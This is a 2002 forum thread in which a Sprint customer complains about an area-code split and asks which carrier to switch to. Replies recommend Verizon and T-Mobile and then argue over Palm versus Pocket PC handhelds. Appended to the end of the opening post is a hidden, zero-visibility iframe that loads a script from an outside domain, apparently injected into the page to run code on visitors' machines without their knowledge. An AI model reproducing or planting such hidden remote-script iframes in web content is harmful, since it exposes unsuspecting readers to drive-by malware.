+ Reply to Thread

Angry WARNING: Area Code Splits

My love/hate relationship with Sprint has swong once more to HATE!

(WARNING: ***** Session Ahead!)

I got a text message on my phone over the weekend that I needed to call into Sprint and have a rep talk me thru an NPA split (my area code is changing). Before I had the rep change my area code, I asked her what message will my customers who call the old area code get?

The first rep didn't know and lacked the initiative to find out. I told her I would call back then once I did the research myself (obviously this rep sufferes from anal-cranial conjunctivitous!)

I hung up and called back, this time getting a rep who didn't know either but at lease was willing to find out for me. After a few more minutes of cheesie hold music, she came back to tell me that anyone calling my old area code will get a message that the number is no longer in service! Not that the number has change, please make a note, but that I have dropped off the face of the earth!!

She offered me 60 minutes free service to contact allllll my customers. I have over 300 in my address book alone plus at least a hundred more who have the numbers to the other two phones on my shared plan!! 60 will only scratch the surface!!

WHAT CRAP!

I've decided then that if I have to contact alllll these people to inform them of my new number, that I may as well just switch PCS providers too!!

I'VE HAD IT WITH SPRINT'S CRAP SERVICE!!!

That is three phones about to fall off their service totalling almost 1500 primetime minutes a month. And all they offer to retain them is 60 minutes!

SEE YA Sprint!

(deep exhail)

With that said, Does anyone have a recommendtion on who I should go with? My phones consist of a Sanyo 4500 in the Washington DC area, another Sanyo 4500 in Denver and my I-300 in lower Michigan. I also make use of Sprint's web mail service (I know! big mistake there too!)

My service contract ends in early December, so that is my target date to have my service converted.

Thanks for your reply and for letting me vent, I feel better already!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

same thing happend to me when i used bellsouth mbility. they changed the area code and i had to go thru the same issue. back then, in 1994 i had no one to turn to. now with competition, its easy as ever!

sorry to hear about your woes but atleast you have somewhere else to turn to...

I would go over to Verizon. I'm switching over to them as soon as they get the 7135, which seems like less than a month away. Sprint's 3G pricing just seems overpriced to me, especially with no way to track your data useage other than a do-it-yourself kinda approach.

I too am thinking about Verizon. Anyone know if their Express Network is available in the Atlanta market? Their website says no, but they have been advertising it on the radio lately? Now that does not make sense. Guess I will have to stop by the Verizon store and find out.
    Carl

wow i thought i was being paranoid i requested an area code they gave it to me but the exchange is on the other side of the state, every one who calls me its long distance does that mean sprint gets paid when im called also ? talk about a win / loose

Napoleon Bonaparte Jr.

hello

Hello to everyone .

If I have a choice , I will switch to Verizon .

But I did switch already to T-Mobil and I am having fun

with my new only 128 megs SD memory .

Only 128 megs for Pocket PC , its the same as 16 megs

for Palm . I do not want to talk about comparing PPCs and Palm .

For me , to switch to PPC , was one big reason ,-

Microsoft Reader . I spent almost one year with Samsung I-300

and all that year I was waiting for Samsung I330 .

PPL you have to understand , you are on the wrong system .

Palm and Pocket PC cannot be compared . Its like comparing

Windows 2000 Pro and Linux . 98% of the people are using

Win 2000 and only 2% Linux . The same us you buying in the

store Timberland or K-Mart shoes .

Plus , if you smart , you can buy now T-mobil for $300 .

The price , what sprint selling Samsung A500 , just a phone !!!

And remember , you have 2 weeks to try with very good

nice customer service ....
    Last edited by sprint; 10-10-2002 at 08:57 PM.

Sprint:
    There is no one clear choice as the right handheld OS. I know, from your other postings that you favor PPC over Palm, but I am the complete opposite. I much perfer the simplicity of the Palm interface. I have owned the original Palm, a Jornada 820 (CE) a Jornada 548 (Pocket PC) a Kyo 6035 (Palm) and now my i300. While the Jornada has a very nice, bright screen, I really missed the simplicity of the Plam while I had it, and was very glad to converge all my technology (phone and handheld) back to the Palm based Kyo 6035. With all that said, I think you have to look at each user to determine the "right" handheld OS. I use my i300 as a phone, but also use the calendar, address, to do list mostly. I also get my mail on it when I am away from my laptop and if called for support use it to dial into systems, routers, etc with a telnet interface. Any Palm based handheld will do these tasks quite well, and my Palm based OS has served me very well. What I do NOT do on my i300 is surf the web (who has that much time?), look at pictures, have a desire to run multimedia apps, etc. My needs are pretty simplistic, and the Palm interface, works very well. So before you make a blanket statement that we are using the "wrong" system, I think you need to look at the requirements of the user. This is going to turn into the old Mac v. PC debate.
    Carl

Re: hello

Originally posted by sprint
    Its like comparing

Windows 2000 Pro and Linux . 98% of the people are using

Win 2000 and only 2% Linux .
    really? I didn't realize there were so few Palm users....... thats news to me.

really? I didn't realize there were so few Palm users....... thats news to me.
    hahaha......... the world according to sprint.........lol........... actually, Jupiter Research recently published the results of an extensive study and projections for through the year 2006:

current: Palm- 76.2 % of the market, PPC/CE- 18.7%
    in 2006 projected: Palm- 58%, PPC- 38%

That's a lot of growth for PPC (69.6% PPC vs. 14.0 % for Palm)
    but it's gonna take a while to get there.
    ..... Sprint Sprint Sprint... don't you know that mis-information is worse than no information???
    .....beam me up Scotty...

I think Palm has seen the battle and has countered with OS5. I guess I will try to stay Palm if there are ever any phones that support it. I guess I just hate to see M$ control yet another aspect of computing.
    Carl

Not to mention their fight to manufacture monitors/televisions. Though I'll appreciate the convenience, I'm not looking forward to paying Big Brother.

I agree but it's a hard question to ignore... e.g. where would we be without Uncle Billy? ...would some other Wizard have filled the void? Apple had their shot & botched it miserably. I agree with Carl as to the usability of Palm but with MS devoting it's considerable resources to the handheld market it can only be good for the consumer. I just wish da MS skunk works would for once test something throroughly before releasing it & coordinate with it's software partners. I Loaded the XP Service Pack v.1 last night & it blew away my cable modem driver ( which was XP specific) & a couple of apps that were written for XP (Style XP, a theme program - no update available). That kind of arogance doesn't serve anyone. So I patiently wait for PPC to mature, if it ever does.
    .....beam me up Scotty...